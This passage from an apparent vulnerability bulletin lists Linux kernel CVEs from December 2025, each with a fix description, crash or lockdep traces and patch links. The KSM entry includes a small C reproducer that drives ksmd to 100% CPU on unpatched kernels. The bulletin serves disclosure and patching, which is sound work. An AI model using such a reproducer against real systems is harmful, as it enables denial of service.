__crash_shrink_memory+0xe5/0x110 crash_shrink_memory+0x12a/0x190 kexec_crash_size_store+0x41/0x80 kernfs_fop_write_iter+0x141/0x1f0 vfs_write+0x294/0x460 ksys_write+0x6d/0xf0 <snip...> This happens because __crash_shrink_memory()/kernel/crash_core.c incorrectly updates the crashk_res resource object even when crashk_low_res should be updated. Fix this by ensuring the correct crashkernel resource object is updated when shrinking crashkernel memory. | 2025-12-16 | not yet calculated | CVE-2025-68198 | https://git.kernel.org/stable/c/f01f9c348d76d40bf104a94449e3ce4057fdefee https://git.kernel.org/stable/c/f89c5e7077f63e45e8ba5a77b7cf0803130367e6 https://git.kernel.org/stable/c/a2bd247f8c6c5ac3f0ba823a2fffd77bb9cdf618 https://git.kernel.org/stable/c/00fbff75c5acb4755f06f08bd1071879c63940c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: codetag: debug: handle existing CODETAG_EMPTY in mark_objexts_empty for slabobj_ext When alloc_slab_obj_exts() fails and then later succeeds in allocating a slab extension vector, it calls handle_failed_objexts_alloc() to mark all objects in the vector as empty. As a result all objects in this slab (slabA) will have their extensions set to CODETAG_EMPTY. Later on if this slabA is used to allocate a slabobj_ext vector for another slab (slabB), we end up with the slabB->obj_exts pointing to a slabobj_ext vector that itself has a non-NULL slabobj_ext equal to CODETAG_EMPTY. When slabB gets freed, free_slab_obj_exts() is called to free slabB->obj_exts vector. free_slab_obj_exts() calls mark_objexts_empty(slabB->obj_exts) which will generate a warning because it expects slabobj_ext vectors to have a NULL obj_ext, not CODETAG_EMPTY. Modify mark_objexts_empty() to skip the warning and setting the obj_ext value if it's already set to CODETAG_EMPTY. To quickly detect this WARN, I modified the code from WARN_ON(slab_exts[offs].ref.ct) to BUG_ON(slab_exts[offs].ref.ct == 1); We then obtained this message: [21630.898561] ------------[ cut here ]------------ [21630.898596] kernel BUG at mm/slub.c:2050! [21630.898611] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP [21630.900372] Modules linked in: squashfs isofs vfio_iommu_type1 vhost_vsock vfio vhost_net vmw_vsock_virtio_transport_common vhost tap vhost_iotlb iommufd vsock binfmt_misc nfsv3 nfs_acl nfs lockd grace netfs tls rds dns_resolver tun brd overlay ntfs3 exfat btrfs blake2b_generic xor xor_neon raid6_pq loop sctp ip6_udp_tunnel udp_tunnel nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables rfkill ip_set sunrpc vfat fat joydev sg sch_fq_codel nfnetlink virtio_gpu sr_mod cdrom drm_client_lib virtio_dma_buf drm_shmem_helper drm_kms_helper drm ghash_ce backlight virtio_net virtio_blk virtio_scsi net_failover virtio_console failover virtio_mmio dm_mirror dm_region_hash dm_log dm_multipath dm_mod fuse i2c_dev virtio_pci virtio_pci_legacy_dev virtio_pci_modern_dev virtio virtio_ring autofs4 aes_neon_bs aes_ce_blk [last unloaded: hwpoison_inject] [21630.909177] CPU: 3 UID: 0 PID: 3787 Comm: kylin-process-m Kdump: loaded Tainted: G W 6.18.0-rc1+ #74 PREEMPT(voluntary) [21630.910495] Tainted: [W]=WARN [21630.910867] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022 [21630.911625] pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [21630.912392] pc : __free_slab+0x228/0x250 [21630.912868] lr : __free_slab+0x18c/0x250 [21630.913334] sp : ffff8000a02f73e0 [21630.913830] x29: ffff8000a02f73e0 x28: fffffdffc43fc800 x27: ffff0000c0011c40 [21630.914677] x26: ffff0000c000cac0 x25: ffff00010fe5e5f0 x24: ffff000102199b40 [21630.915469] x23: 0000000000000003 x22: 0000000000000003 x21: ffff0000c0011c40 [21630.916259] x20: fffffdffc4086600 x19: fffffdffc43fc800 x18: 0000000000000000 [21630.917048] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [21630.917837] x14: 0000000000000000 x13: 0000000000000000 x12: ffff70001405ee66 [21630.918640] x11: 1ffff0001405ee65 x10: ffff70001405ee65 x9 : ffff800080a295dc [21630.919442] x8 : ffff8000a02f7330 x7 : 0000000000000000 x6 : 0000000000003000 [21630.920232] x5 : 0000000024924925 x4 : 0000000000000001 x3 : 0000000000000007 [21630.921021] x2 : 0000000000001b40 x1 : 000000000000001f x0 : 0000000000000001 [21630.921810] Call trace: [21630.922130] __free_slab+0x228/0x250 (P) [21630.922669] free_slab+0x38/0x118 [21630.923079] free_to_partial_list+0x1d4/0x340 [21630.923591] __slab_free+0x24c/0x348 [21630.924024] ___cache_free+0xf0/0x110 [21630.924468] qlist_free_all+0x78/0x130 [21630.924922] kasan_quarantine_reduce+0x11 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68199 | https://git.kernel.org/stable/c/fc6acd4cddf76e7eb7db63649fe36980ce208f56 https://git.kernel.org/stable/c/3f56c407feb967e6faeb4e2e04eaa8edc206a686 https://git.kernel.org/stable/c/1abbdf3d57aa964e572940d67c9ec5dc87710738 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Add bpf_prog_run_data_pointers() syzbot found that cls_bpf_classify() is able to change tc_skb_cb(skb)->drop_reason triggering a warning in sk_skb_reason_drop(). WARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline] WARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214 struct tc_skb_cb has been added in commit ec624fe740b4 ("net/sched: Extend qdisc control block with tc control block"), which added a wrong interaction with db58ba459202 ("bpf: wire in data and data_end for cls_act_bpf"). drop_reason was added later. Add bpf_prog_run_data_pointers() helper to save/restore the net_sched storage colliding with BPF data_meta/data_end. | 2025-12-16 | not yet calculated | CVE-2025-68200 | https://git.kernel.org/stable/c/c4cdd143c35974a2cedd000fa9eb3accc3023b20 https://git.kernel.org/stable/c/5e149d8a8e732126fb6014efd60075cf63a73f91 https://git.kernel.org/stable/c/baa61dcaa50b7141048c8d2aede7fe9ed8f21d11 https://git.kernel.org/stable/c/6392e5f4b1a3cce10e828309baf35d22abd3457d https://git.kernel.org/stable/c/8dd2fe5f5d586c8e87307b7a271f6b994afcc006 https://git.kernel.org/stable/c/4ef92743625818932b9c320152b58274c05e5053 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: remove two invalid BUG_ON()s Those can be triggered trivially by userspace. | 2025-12-16 | not yet calculated | CVE-2025-68201 | https://git.kernel.org/stable/c/eaf12bffd7f79f4d46ec028706f9d1a2d90f46fd https://git.kernel.org/stable/c/a41bdba05899c7f455cd960ef0713acc335370dc https://git.kernel.org/stable/c/5d55ed19d4190d2c210ac05ac7a53f800a8c6fe5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix unsafe locking in the scx_dump_state() For kernels built with CONFIG_PREEMPT_RT=y, the dump_lock will be converted to a sleepable spinlock that does not disable irqs, so the following scenario occurs: inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. irq_work/0/27 [HC0[0]:SC0[0]:HE1:SE1] takes: (&rq->__lock){?...}-{2:2}, at: raw_spin_rq_lock_nested+0x2b/0x40 {IN-HARDIRQ-W} state was registered at: lock_acquire+0x1e1/0x510 _raw_spin_lock_nested+0x42/0x80 raw_spin_rq_lock_nested+0x2b/0x40 sched_tick+0xae/0x7b0 update_process_times+0x14c/0x1b0 tick_periodic+0x62/0x1f0 tick_handle_periodic+0x48/0xf0 timer_interrupt+0x55/0x80 __handle_irq_event_percpu+0x20a/0x5c0 handle_irq_event_percpu+0x18/0xc0 handle_irq_event+0xb5/0x150 handle_level_irq+0x220/0x460 __common_interrupt+0xa2/0x1e0 common_interrupt+0xb0/0xd0 asm_common_interrupt+0x2b/0x40 _raw_spin_unlock_irqrestore+0x45/0x80 __setup_irq+0xc34/0x1a30 request_threaded_irq+0x214/0x2f0 hpet_time_init+0x3e/0x60 x86_late_time_init+0x5b/0xb0 start_kernel+0x308/0x410 x86_64_start_reservations+0x1c/0x30 x86_64_start_kernel+0x96/0xa0 common_startup_64+0x13e/0x148 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&rq->__lock); <Interrupt> lock(&rq->__lock); *** DEADLOCK *** stack backtrace: CPU: 0 UID: 0 PID: 27 Comm: irq_work/0 Call Trace: <TASK> dump_stack_lvl+0x8c/0xd0 dump_stack+0x14/0x20 print_usage_bug+0x42e/0x690 mark_lock.part.44+0x867/0xa70 ? __pfx_mark_lock.part.44+0x10/0x10 ? string_nocheck+0x19c/0x310 ? number+0x739/0x9f0 ? __pfx_string_nocheck+0x10/0x10 ? __pfx_check_pointer+0x10/0x10 ? kvm_sched_clock_read+0x15/0x30 ? sched_clock_noinstr+0xd/0x20 ? local_clock_noinstr+0x1c/0xe0 __lock_acquire+0xc4b/0x62b0 ? __pfx_format_decode+0x10/0x10 ? __pfx_string+0x10/0x10 ? __pfx___lock_acquire+0x10/0x10 ? __pfx_vsnprintf+0x10/0x10 lock_acquire+0x1e1/0x510 ? raw_spin_rq_lock_nested+0x2b/0x40 ? __pfx_lock_acquire+0x10/0x10 ? dump_line+0x12e/0x270 ? raw_spin_rq_lock_nested+0x20/0x40 _raw_spin_lock_nested+0x42/0x80 ? raw_spin_rq_lock_nested+0x2b/0x40 raw_spin_rq_lock_nested+0x2b/0x40 scx_dump_state+0x3b3/0x1270 ? finish_task_switch+0x27e/0x840 scx_ops_error_irq_workfn+0x67/0x80 irq_work_single+0x113/0x260 irq_work_run_list.part.3+0x44/0x70 run_irq_workd+0x6b/0x90 ? __pfx_run_irq_workd+0x10/0x10 smpboot_thread_fn+0x529/0x870 ? __pfx_smpboot_thread_fn+0x10/0x10 kthread+0x305/0x3f0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x40/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> This commit therefore uses rq_lock_irqsave/irqrestore() to replace rq_lock/unlock() in scx_dump_state(). | 2025-12-16 | not yet calculated | CVE-2025-68202 | https://git.kernel.org/stable/c/13d1c96d3a9f208bc1aa8642f6362dca25a157d2 https://git.kernel.org/stable/c/b6109750063d3b9aca1c57031213ac5485a06c54 https://git.kernel.org/stable/c/5f02151c411dda46efcc5dc57b0845efcdcfc26d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix lock warning in amdgpu_userq_fence_driver_process Fix a potential deadlock caused by inconsistent spinlock usage between interrupt and process contexts in the userq fence driver. The issue occurs when amdgpu_userq_fence_driver_process() is called from both: - Interrupt context: gfx_v11_0_eop_irq() -> amdgpu_userq_fence_driver_process() - Process context: amdgpu_eviction_fence_suspend_worker() -> amdgpu_userq_fence_driver_force_completion() -> amdgpu_userq_fence_driver_process() In interrupt context, the spinlock was acquired without disabling interrupts, leaving it in {IN-HARDIRQ-W} state. When the same lock is acquired in process context, the kernel detects inconsistent locking since the process context acquisition would enable interrupts while holding a lock previously acquired in interrupt context. Kernel log shows: [ 4039.310790] inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. [ 4039.310804] kworker/7:2/409 [HC0[0]:SC0[0]:HE1:SE1] takes: [ 4039.310818] ffff9284e1bed000 (&fence_drv->fence_list_lock){?...}-{3:3}, [ 4039.310993] {IN-HARDIRQ-W} state was registered at: [ 4039.311004] lock_acquire+0xc6/0x300 [ 4039.311018] _raw_spin_lock+0x39/0x80 [ 4039.311031] amdgpu_userq_fence_driver_process.part.0+0x30/0x180 [amdgpu] [ 4039.311146] amdgpu_userq_fence_driver_process+0x17/0x30 [amdgpu] [ 4039.311257] gfx_v11_0_eop_irq+0x132/0x170 [amdgpu] Fix by using spin_lock_irqsave()/spin_unlock_irqrestore() to properly manage interrupt state regardless of calling context. (cherry picked from commit ded3ad780cf97a04927773c4600823b84f7f3cc2) | 2025-12-16 | not yet calculated | CVE-2025-68203 | https://git.kernel.org/stable/c/1ad70a06d7e91c378b346a3718c81abb50a74b74 https://git.kernel.org/stable/c/6623c5f9fd877868fba133b4ae4dab0052e82dad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: arm: scmi: Fix genpd leak on provider registration failure If of_genpd_add_provider_onecell() fails during probe, the previously created generic power domains are not removed, leading to a memory leak and potential kernel crash later in genpd_debug_add(). Add proper error handling to unwind the initialized domains before returning from probe to ensure all resources are correctly released on failure. Example crash trace observed without this fix: \| Unable to handle kernel paging request at virtual address fffffffffffffc70 \| CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.18.0-rc1 #405 PREEMPT \| Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform \| pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) \| pc : genpd_debug_add+0x2c/0x160 \| lr : genpd_debug_init+0x74/0x98 \| Call trace: \| genpd_debug_add+0x2c/0x160 (P) \| genpd_debug_init+0x74/0x98 \| do_one_initcall+0xd0/0x2d8 \| do_initcall_level+0xa0/0x140 \| do_initcalls+0x60/0xa8 \| do_basic_setup+0x28/0x40 \| kernel_init_freeable+0xe8/0x170 \| kernel_init+0x2c/0x140 \| ret_from_fork+0x10/0x20 | 2025-12-16 | not yet calculated | CVE-2025-68204 | https://git.kernel.org/stable/c/18249a167ffd91b4b4fbd92afd4ddcbf3af81f35 https://git.kernel.org/stable/c/c6e11d320fd6cbaef6d589f2fcb45aa25a6b960a https://git.kernel.org/stable/c/582f48d22eb5676fe7be3589b986ddd29f7bf4d1 https://git.kernel.org/stable/c/7f569197f7ad09319af960bd7e43109de5c67c04 https://git.kernel.org/stable/c/ad120c08b89a81d41d091490bbe150343473b659 https://git.kernel.org/stable/c/921b090841ae7a08b19ab14495bdf8636dc31e21 https://git.kernel.org/stable/c/983e91da82ec3e331600108f9be3ea61236f5c75 https://git.kernel.org/stable/c/7458f72cc28f9eb0de811effcb5376d0ec19094a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda/hdmi: Fix breakage at probing nvhdmi-mcp driver After restructuring and splitting the HDMI codec driver code, each HDMI codec driver contains its own build_controls and build_pcms ops. A copy-n-paste error put the wrong entries for the nvhdmi-mcp driver; both build_controls and build_pcms are swapped. Unfortunately both callbacks have the very same form, and the compiler didn't complain about it, either. This resulted in a NULL dereference because the PCM instance hasn't been initialized at the time the build_controls callback is called. Fix it by passing the proper entries. | 2025-12-16 | not yet calculated | CVE-2025-68205 | https://git.kernel.org/stable/c/d2aed6fac1148528181affb781aa683d6569042b https://git.kernel.org/stable/c/82420bd4e17bdaba8453fbf9e10c58c9ed0c9727 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: add seqadj extension for natted connections Sequence adjustment may be required for FTP traffic with PASV/EPSV modes, due to the need to re-write packet payload (IP, port) on the ftp control connection. This can require changes to the TCP length and expected seq / ack_seq. The easiest way to reproduce this issue is with PASV mode. Example ruleset: table inet ftp_nat { ct helper ftp_helper { type "ftp" protocol tcp l3proto inet } chain prerouting { type filter hook prerouting priority 0; policy accept; tcp dport 21 ct state new ct helper set "ftp_helper" } } table ip nat { chain prerouting { type nat hook prerouting priority -100; policy accept; tcp dport 21 dnat ip prefix to ip daddr map { 192.168.100.1 : 192.168.13.2/32 } } chain postrouting { type nat hook postrouting priority 100 ; policy accept; tcp sport 21 snat ip prefix to ip saddr map { 192.168.13.2 : 192.168.100.1/32 } } } Note that the ftp helper gets assigned *after* the dnat setup. The inverse (nat after helper assign) is handled by an existing check in nf_nat_setup_info() and will not show the problem. Topology: +-------------------+ +----------------------------------+ | FTP: 192.168.13.2 | <-> | NAT: 192.168.13.3, 192.168.100.1 | +-------------------+ +----------------------------------+ | +-----------------------+ | Client: 192.168.100.2 | +-----------------------+ ftp nat changes do not work as expected in this case: Connected to 192.168.100.1. [..] ftp> epsv EPSV/EPRT on IPv4 off. ftp> ls 227 Entering passive mode (192,168,100,1,209,129). 421 Service not available, remote server has closed connection. Kernel logs: Missing nfct_seqadj_ext_add() setup call WARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41 [..] __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat] nf_nat_ftp+0x142/0x280 [nf_nat_ftp] help+0x4d1/0x880 [nf_conntrack_ftp] nf_confirm+0x122/0x2e0 [nf_conntrack] nf_hook_slow+0x3c/0xb0 .. Fix this by adding the required extension when a conntrack helper is assigned to a connection that has a nat binding. | 2025-12-16 | not yet calculated | CVE-2025-68206 | https://git.kernel.org/stable/c/2b52d89cbbb0dbe3e948d8d9a91e704316dccfe6 https://git.kernel.org/stable/c/90918e3b6404c2a37837b8f11692471b4c512de2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Synchronize Dead CT worker with unbind Cancel and wait for any Dead CT worker to complete before continuing with device unbinding. Else the worker will end up using resources freed by the unbind operation. (cherry picked from commit 492671339114e376aaa38626d637a2751cdef263) | 2025-12-16 | not yet calculated | CVE-2025-68207 | https://git.kernel.org/stable/c/35959ab7d16b618616edf6df882a4533d2efe193 https://git.kernel.org/stable/c/ce6ccf8e881a919bf902174ac879f80c97669498 https://git.kernel.org/stable/c/95af8f4fdce8349a5fe75264007f1af2aa1082ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: account for current allocated stack depth in widen_imprecise_scalars() The usage pattern for widen_imprecise_scalars() looks as follows: prev_st = find_prev_entry(env, ...); queued_st = push_stack(...); widen_imprecise_scalars(env, prev_st, queued_st); Where prev_st is an ancestor of the queued_st in the explored states tree. This ancestor is not guaranteed to have the same allocated stack depth as queued_st. E.g. in the following case: def main(): for i in 1..2: foo(i) // same callsite, different param def foo(i): if i == 1: use 128 bytes of stack iterator based loop Here, for a second 'foo' call prev_st->allocated_stack is 128, while queued_st->allocated_stack is much smaller. widen_imprecise_scalars() needs to take this into account and avoid accessing bpf_verifier_state->frame[*]->stack out of bounds. | 2025-12-16 | not yet calculated | CVE-2025-68208 | https://git.kernel.org/stable/c/64b12dca2b0abcb5fc0542887d18b926ea5cf711 https://git.kernel.org/stable/c/9944c7938cd5b3f37b0afec0481c7c015e4f1c58 https://git.kernel.org/stable/c/57e04e2ff56e32f923154f0f7bc476fcb596ffe7 https://git.kernel.org/stable/c/b0c8e6d3d866b6a7f73877f71968dbffd27b7785 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlx5: Fix default values in create CQ Currently, CQs without a completion function are assigned the mlx5_add_cq_to_tasklet function by default. This is problematic since only user CQs created through the mlx5_ib driver are intended to use this function. Additionally, all CQs that will use doorbells instead of polling for completions must call mlx5_cq_arm. However, the default CQ creation flow leaves a valid value in the CQ's arm_db field, allowing FW to send interrupts to polling-only CQs in certain corner cases. These two factors would allow a polling-only kernel CQ to be triggered by an EQ interrupt and call a completion function intended only for user CQs, causing a null pointer exception. Some areas in the driver have prevented this issue with one-off fixes but did not address the root cause. This patch fixes the described issue by adding defaults to the create CQ flow. It adds a default dummy completion function to protect against null pointer exceptions, and it sets an invalid command sequence number by default in kernel CQs to prevent the FW from sending an interrupt to the CQ until it is armed. User CQs are responsible for their own initialization values. Callers of mlx5_core_create_cq are responsible for changing the completion function and arming the CQ per their needs. | 2025-12-16 | not yet calculated | CVE-2025-68209 | https://git.kernel.org/stable/c/08469f5393a1a39f26a6e2eb2e8c33187665c1f4 https://git.kernel.org/stable/c/e5eba42f01340f73888dfe560be2806057c25913 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: avoid infinite loop due to incomplete zstd-compressed data Currently, the decompression logic incorrectly spins if compressed data is truncated in crafted (deliberately corrupted) images. | 2025-12-16 | not yet calculated | CVE-2025-68210 | https://git.kernel.org/stable/c/4d0e0bb1908acac5b27d30b45c450e8ead97eb00 https://git.kernel.org/stable/c/1f86d73a0afe43b6a85d2aa8207853350b7e2111 https://git.kernel.org/stable/c/f2a12cc3b97f062186568a7b94ddb7aa2ef68140 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item Currently, scan_get_next_rmap_item() walks every page address in a VMA to locate mergeable pages. This becomes highly inefficient when scanning large virtual memory areas that contain mostly unmapped regions, causing ksmd to use a large amount of cpu without deduplicating many pages. This patch replaces the per-address lookup with a range walk using walk_page_range(). The range walker allows KSM to skip over entire unmapped holes in a VMA, avoiding unnecessary lookups. This problem was previously discussed in [1]. Consider the following test program which creates a 32 TiB mapping in the virtual address space but only populates a single page: #include <unistd.h> #include <stdio.h> #include <sys/mman.h> /* 32 TiB */ const size_t size = 32ul * 1024 * 1024 * 1024 * 1024; int main() { char *area = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0); if (area == MAP_FAILED) { perror("mmap() failed\n"); return -1; } /* Populate a single page such that we get an anon_vma. */ *area = 0; /* Enable KSM. */ madvise(area, size, MADV_MERGEABLE); pause(); return 0; } $ ./ksm-sparse & $ echo 1 > /sys/kernel/mm/ksm/run Without this patch ksmd uses 100% of the cpu for a long time (more than 1 hour on my test machine) scanning all of the 32 TiB virtual address space that contains only one mapped page. This makes ksmd essentially deadlocked, not able to deduplicate anything of value. With this patch ksmd walks only the one mapped page and skips the rest of the 32 TiB virtual address space, making the scan fast using little cpu. | 2025-12-16 | not yet calculated | CVE-2025-68211 | https://git.kernel.org/stable/c/74f78421c925b6d17695566f0c5941de57fd44b3 https://git.kernel.org/stable/c/f62973e0767e4fcd6799087787fca08ca2a85b8c https://git.kernel.org/stable/c/f5548c318d6520d4fa3c5ed6003eeb710763cbc5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: Fix uninitialized 'offp' in statmount_string() In statmount_string(), most flags assign an output offset pointer (offp) which is later updated with the string offset. However, the STATMOUNT_MNT_UIDMAP and STATMOUNT_MNT_GIDMAP cases directly set the struct fields instead of using offp. This leaves offp uninitialized, leading to a possible uninitialized dereference when *offp is updated. Fix it by assigning offp for UIDMAP and GIDMAP as well, keeping the code path consistent. | 2025-12-16 | not yet calculated | CVE-2025-68212 | https://git.kernel.org/stable/c/acfde9400e611c8d2668f1c70053c4a1d6ecfc36 https://git.kernel.org/stable/c/0778ac7df5137d5041783fadfc201f8fd55a1d9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: fix possible vport_config NULL pointer deref in remove Attempting to remove the driver will cause a crash in cases where the vport failed to initialize. The following trace is from an instance where the driver failed during an attempt to create a VF: [ 1661.543624] idpf 0000:84:00.7: Device HW Reset initiated [ 1722.923726] idpf 0000:84:00.7: Transaction timed-out (op:1 cookie:2900 vc_op:1 salt:29 timeout:60000ms) [ 1723.353263] BUG: kernel NULL pointer dereference, address: 0000000000000028 ... [ 1723.358472] RIP: 0010:idpf_remove+0x11c/0x200 [idpf] ... [ 1723.364973] Call Trace: [ 1723.365475] <TASK> [ 1723.365972] pci_device_remove+0x42/0xb0 [ 1723.366481] device_release_driver_internal+0x1a9/0x210 [ 1723.366987] pci_stop_bus_device+0x6d/0x90 [ 1723.367488] pci_stop_and_remove_bus_device+0x12/0x20 [ 1723.367971] pci_iov_remove_virtfn+0xbd/0x120 [ 1723.368309] sriov_disable+0x34/0xe0 [ 1723.368643] idpf_sriov_configure+0x58/0x140 [idpf] [ 1723.368982] sriov_numvfs_store+0xda/0x1c0 Avoid the NULL pointer dereference by adding a NULL pointer check for vport_config[i] before freeing user_config.q_coalesce. | 2025-12-16 | not yet calculated | CVE-2025-68213 | https://git.kernel.org/stable/c/a0e1c9bc1c9fe735978150ad075616a728073bc7 https://git.kernel.org/stable/c/d5be8663cff0ba7b94da34ebd499ce1123b4c334 https://git.kernel.org/stable/c/118082368c2b6ddefe6cb607efc312285148f044 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: timers: Fix NULL function pointer race in timer_shutdown_sync() There is a race condition between timer_shutdown_sync() and timer expiration that can lead to hitting a WARN_ON in expire_timers(). The issue occurs when timer_shutdown_sync() clears the timer function to NULL while the timer is still running on another CPU. The race scenario looks like this: CPU0 CPU1 <SOFTIRQ> lock_timer_base() expire_timers() base->running_timer = timer; unlock_timer_base() [call_timer_fn enter] mod_timer() ... timer_shutdown_sync() lock_timer_base() // For now, will not detach the timer but only clear its function to NULL if (base->running_timer != timer) ret = detach_if_pending(timer, base, true); if (shutdown) timer->function = NULL; unlock_timer_base() [call_timer_fn exit] lock_timer_base() base->running_timer = NULL; unlock_timer_base() ... // Now timer is pending while its function set to NULL. // next timer trigger <SOFTIRQ> expire_timers() WARN_ON_ONCE(!fn) // hit ... lock_timer_base() // Now timer will detach if (base->running_timer != timer) ret = detach_if_pending(timer, base, true); if (shutdown) timer->function = NULL; unlock_timer_base() The problem is that timer_shutdown_sync() clears the timer function regardless of whether the timer is currently running. This can leave a pending timer with a NULL function pointer, which triggers the WARN_ON_ONCE(!fn) check in expire_timers(). Fix this by only clearing the timer function when actually detaching the timer. If the timer is running, leave the function pointer intact, which is safe because the timer will be properly detached when it finishes running. | 2025-12-16 | not yet calculated | CVE-2025-68214 | https://git.kernel.org/stable/c/1a975716cc8977f461e45e28e3e5977d46ad7a6a https://git.kernel.org/stable/c/6665fbd7730b26d770c232b20d1b907e6a67a914 https://git.kernel.org/stable/c/176725f4848376530a0f0da9023f956afcc33585 https://git.kernel.org/stable/c/a01efa7a780c42ac5170a949bd95c9786ffcc60a https://git.kernel.org/stable/c/20739af07383e6eb1ec59dcd70b72ebfa9ac362c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix PTP cleanup on driver removal in error path Improve the cleanup on releasing PTP resources in error path. The error case might happen either at the driver probe and PTP feature initialization or on PTP restart (errors in reset handling, NVM update etc). In both cases, calls to PF PTP cleanup (ice_ptp_cleanup_pf function) and 'ps_lock' mutex deinitialization were missed. Additionally, ptp clock was not unregistered in the latter case. Keep PTP state as 'uninitialized' on init to distinguish between error scenarios and to avoid resource release duplication at driver removal. The consequence of missing ice_ptp_cleanup_pf call is the following call trace dumped when ice_adapter object is freed (port list is not empty, as it is required at this stage): [ T93022] ------------[ cut here ]------------ [ T93022] WARNING: CPU: 10 PID: 93022 at ice/ice_adapter.c:67 ice_adapter_put+0xef/0x100 [ice] ... [ T93022] RIP: 0010:ice_adapter_put+0xef/0x100 [ice] ... [ T93022] Call Trace: [ T93022] <TASK> [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] ? __warn.cold+0xb0/0x10e [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] ? report_bug+0xd8/0x150 [ T93022] ? handle_bug+0xe9/0x110 [ T93022] ? exc_invalid_op+0x17/0x70 [ T93022] ? asm_exc_invalid_op+0x1a/0x20 [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] pci_device_remove+0x42/0xb0 [ T93022] device_release_driver_internal+0x19f/0x200 [ T93022] driver_detach+0x48/0x90 [ T93022] bus_remove_driver+0x70/0xf0 [ T93022] pci_unregister_driver+0x42/0xb0 [ T93022] ice_module_exit+0x10/0xdb0 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] ... [ T93022] ---[ end trace 0000000000000000 ]--- [ T93022] ice: module unloaded | 2025-12-16 | not yet calculated | CVE-2025-68215 | https://git.kernel.org/stable/c/f5eb91f876ebecbcd90f9edcaea98dcb354603b3 https://git.kernel.org/stable/c/765236f2c4fbba7650436b71a0e350500e9ec15f https://git.kernel.org/stable/c/23a5b9b12de9dcd15ebae4f1abc8814ec1c51ab0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Disable trampoline for kernel module function trace The current LoongArch BPF trampoline implementation is incompatible with tracing functions in kernel modules. This causes several severe and user-visible problems: * The `bpf_selftests/module_attach` test fails consistently. * Kernel lockup when a BPF program is attached to a module function [1]. * Critical kernel modules like WireGuard experience traffic disruption when their functions are traced with fentry [2]. Given the severity and the potential for other unknown side-effects, it is safest to disable the feature entirely for now. This patch prevents the BPF subsystem from allowing trampoline attachments to kernel module functions on LoongArch. This is a temporary mitigation until the core issues in the trampoline code for kernel module handling can be identified and fixed. [root@fedora bpf]# ./test_progs -a module_attach -v bpf_testmod.ko is already unloaded. Loading bpf_testmod.ko... Successfully loaded bpf_testmod.ko. test_module_attach:PASS:skel_open 0 nsec test_module_attach:PASS:set_attach_target 0 nsec test_module_attach:PASS:set_attach_target_explicit 0 nsec test_module_attach:PASS:skel_load 0 nsec libbpf: prog 'handle_fentry': failed to attach: -ENOTSUPP libbpf: prog 'handle_fentry': failed to auto-attach: -ENOTSUPP test_module_attach:FAIL:skel_attach skeleton attach failed: -524 Summary: 0/0 PASSED, 0 SKIPPED, 1 FAILED Successfully unloaded bpf_testmod.ko. [1]: https://lore.kernel.org/loongarch/CAK3+h2wDmpC-hP4u4pJY8T-yfKyk4yRzpu2LMO+C13FMT58oqQ@mail.gmail.com/ [2]: https://lore.kernel.org/loongarch/CAK3+h2wYcpc+OwdLDUBvg2rF9rvvyc5amfHT-KcFaK93uoELPg@mail.gmail.com/ | 2025-12-16 | not yet calculated | CVE-2025-68216 | https://git.kernel.org/stable/c/44eb3849378be5f72b8be03edbacbdcd6f5eade4 